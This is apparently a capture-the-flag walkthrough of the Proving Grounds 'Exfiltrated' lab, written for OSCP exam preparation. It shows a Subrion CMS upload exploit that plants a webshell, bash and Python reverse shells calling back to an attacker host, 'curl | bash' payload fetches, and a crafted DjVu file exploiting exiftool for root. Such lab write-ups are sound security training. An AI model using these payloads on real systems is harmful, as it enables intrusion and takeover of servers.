Proving grounds:Exfiltrated

Today we will take a look at Proving grounds: Exfiltrated. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

• Network scan

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Subrion CMS — Open Source Content Management System
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-title: Home :: Powered by Subrion 4.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Apache (80)

Add to the hosts file.

└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.250.163 exfiltrated.offsec

http://exfiltrated.offsec/panel/

Check default credential

admin:admin

Look for an exploit according to the version of the CMS

└─# searchsploit Subrion CMS 4.2.1
Subrion CMS 4.2.1 — Arbitrary File Upload | php/webapps/49876.py
└─# searchsploit -m php/webapps/49876.py
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: Y1pnLHaAFll0W1VUW6I7bD0XPpc0iJJ719ZVspL5
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: kobwkomavbmiyio
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/kobwkomavbmiyio.phar
$ whoami
www-data

I get reverse again to upgrade shell

└─# cat exploit.sh 
#!/bin/bash
bash -i >& /dev/tcp/192.168.49.250/4242 0>&1
└─# python3 -m http.server 80
$ curl 192.168.49.250/exploit.sh | bash
└─# nc -nvlp 4242 
listening on [any] 4242 ...
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.163] 51084
bash: cannot set terminal process group (897): Inappropriate ioctl for device
bash: no job control in this shell
www-data@exfiltrated:/var/www/html/subrion/uploads$
python3 -c ‘import pty;pty.spawn(“/bin/bash”);’
export TERM=xterm
Ctrl + z
stty raw -echo ; fg
reset

• Privesc (exiftool)

www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /etc/crontab
* * * * root bash /opt/image-exif.sh
www-data@exfiltrated:/var/www/html/subrion/uploads$ cat /opt/image-exif.sh 
#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata
echo -ne “\\n metadata directory cleaned! \\n\\n”
IMAGES=’/var/www/html/subrion/uploads’
META=’/opt/metadata’
FILE=`openssl rand -hex 5`
LOGFILE=”$META/$FILE”
echo -ne “\\n Processing EXIF metadata now… \\n\\n”
ls $IMAGES | grep “jpg” | while read filename; 
do 
 exiftool “$IMAGES/$filename” >> $LOGFILE 
done
echo -ne “\\n\\n Processing is finished! \\n\\n\\n”

Look at the version of Exiftool

www-data@exfiltrated:/var/www/html/subrion/uploads$ exiftool -ver
11.88

https://www.exploit-db.com/docs/49881

┌──(root㉿kali)-[~/ctf]
└─# sudo apt-get update && sudo apt-get install -y djvulibre-bin
└─# cat shell.sh 
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.250",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
└─# cat exploit
(metadata "\c${system ('curl 192.168.49.250/shell.sh | bash')};")
└─# djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
└─# mv exploit.djvu exploit.jpg
└─# nc -nvlp 4444

On the target machine

www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.49.250/exploit.jpg

After a few minutes

└─# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.163] 48712
/bin/sh: 0: can’t access tty; job control turned off
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -a
Linux exfiltrated 5.4.0–74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”